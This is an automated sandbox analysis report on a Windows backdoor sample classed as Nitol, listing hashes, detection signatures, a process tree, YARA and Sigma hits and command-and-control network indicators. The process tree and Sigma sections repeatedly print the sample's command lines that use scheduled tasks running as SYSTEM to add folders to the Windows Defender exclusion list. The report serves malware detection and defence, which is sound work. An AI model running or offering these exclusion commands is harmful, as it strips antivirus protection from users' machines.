Edit tour

Windows Analysis Report
0000000000000000.exe

Overview

General Information

Sample name:	0000000000000000.exe
Analysis ID:	1582965
MD5:	4082e7b105c3e8adfa454f1b09890a2a
SHA1:	592725671389bbb3d2185f143b027f90dd89fc99
SHA256:	626b596d98fb4d517a9d154acaaaa215a185d13bf07d38fd1eb52940abe18e47
Tags:	backdoorexeuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

0000000000000000.exe (PID: 7624 cmdline: "C:\Users\user\Desktop\0000000000000000.exe" MD5: 4082E7B105C3E8ADFA454F1B09890A2A)

qWXt7a.exe (PID: 8152 cmdline: C:\Users\user\Documents\qWXt7a.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

qWXt7a.exe (PID: 8184 cmdline: C:\Users\user\Documents\qWXt7a.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 7392 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1308 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1260 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5296 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7516 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6096 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7320 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5480 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1196 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4484 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7736 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4564 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7576 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7548 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3552 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7944 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

Nw13Wr.exe (PID: 7976 cmdline: "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 2112 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3368 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4888 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7508 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7680 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1360 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 6012 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5244 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7920 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

Nw13Wr.exe (PID: 2848 cmdline: "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

aPkMBkaA.exe (PID: 4840 cmdline: "C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

Nw13Wr.exe (PID: 3964 cmdline: "C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

aPkMBkaA.exe (PID: 3900 cmdline: "C:\Program Files (x86)\W9sgnm2c\aPkMBkaA.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.3520874451.0000000004110000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000027.00000002.3521493710.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: Nw13Wr.exe PID: 7976	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: Nw13Wr.exe PID: 7976	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x50ac7:$Dwork: d:\work 0x819f8:$Dwork: d:\work 0xe34fe:$Dwork: d:\work 0x11484e:$Shell6: Shell6 0x11562d:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.Nw13Wr.exe.41103e8.6.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.Nw13Wr.exe.41103e8.6.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.Nw13Wr.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
4.2.qWXt7a.exe.27c0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
39.2.Nw13Wr.exe.2fd0000.5.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\qWXt7a.exe, ParentImage: C:\Users\user\Documents\qWXt7a.exe, ParentProcessId: 8184, ParentProcessName: qWXt7a.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7392, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3368, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 4888, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 4888, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-01T08:31:48.107706+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	50019	8.217.35.192	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0000000000000000.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Program Files (x86)\Nw13Wr\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: 0000000000000000.exe	ReversingLabs: Detection: 15%
Source: 0000000000000000.exe	Virustotal: Detection: 19%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Nw13Wr\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\W9sgnm2c\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Unpacked PE file: 39.2.Nw13Wr.exe.2590000.3.unpack
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Unpacked PE file: 39.2.Nw13Wr.exe.4950000.7.unpack

Source: unknown	HTTPS traffic detected: 39.103.20.97:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:49865 version: TLS 1.2

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: Nw13Wr.exe, 00000027.00000002.3518373727.000000000082E000.00000004.00000020.00020000.00000000.sdmp, Nw13Wr.exe, 00000027.00000000.2769121869.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000027.00000002.3518617798.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000028.00000000.2794834354.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 00000028.00000002.2812479258.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, aPkMBkaA.exe, 00000029.00000002.2814516029.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, aPkMBkaA.exe, 00000029.00000000.2800597986.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, Nw13Wr.exe, 0000002C.00000002.2976998004.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, Nw13Wr.exe, 0000002C.00000000.2964486452.0000000000BF8000.00000002.00000001.01000000.0000000A.sdmp, aPkMBkaA.exe, 0000002D.00000002.2978478462.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, aPkMBkaA.exe, 0000002D.00000000.2970455672.0000000000948000.00000002.00000001.01000000.0000000C.sdmp, Nw13Wr.exe.5.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: GoogleUpdateComRegisterShell64_unsigned.pdb source: 0000000000000000.exe
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: qWXt7a.exe, 00000004.00000002.2311190548.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe, 00000004.00000000.2305123527.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe, 00000005.00000000.2323536652.0000000140014000.00000002.00000001.01000000.00000008.sdmp, qWXt7a.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\Nw13Wr\Nw13Wr.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe

Code function: 4_2_00007FFE1320A1B8 FindFirstFileExW,

4_2_00007FFE1320A1B8

Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\qWXt7a.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DFFE
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDFF
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_0000000140011270
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DE96
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DEFB
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000E178
Source: C:\Users\user\Documents\qWXt7a.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50019 -> 8.217.35.192:8917

Source: global traffic

TCP traffic: 192.168.2.4:50019 -> 8.217.35.192:8917

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.35.192
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.35.192
Source: unknown	TCP traffic detected without corresponding DNS query: 8.217.35.192
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
